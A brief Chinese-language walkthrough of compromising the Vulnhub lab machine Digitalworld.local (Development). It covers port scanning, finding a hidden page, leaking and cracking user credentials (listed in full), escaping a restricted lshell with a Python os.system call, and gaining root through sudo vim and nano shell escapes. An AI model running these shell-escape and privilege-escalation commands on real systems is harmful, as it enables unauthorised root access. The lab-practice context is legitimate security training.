Vulnhub:Digitalworld.local (Development)靶机
kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130
查看网站首页源码
访问development目录,提示存在一个流量包
查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php
访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错
根据报错搜索关键字
在exp中提示通过访问slog_users.txt获取敏感信息
md5解密
intern | 12345678900987654321
patrick | P@ssw0rd25
qiu | qiu
使用intern用户登录目标
lshell绕过
echo os.system('/bin/bash')
提权
使用之前得到的密码,切换到patrick用户查看sudo权限
vim提权
提权方法:vim | GTFOBins
sudo -u root vim -c ':!/bin/bash'
nano提权
提权方法:nano | GTFOBins
sudo -u root nano
^R^X
reset; sh 1>&0 2>&0
运行nano后,键盘ctrl+r
ctrl+x
输入命令:reset; sh 1>&0 2>&0,后回车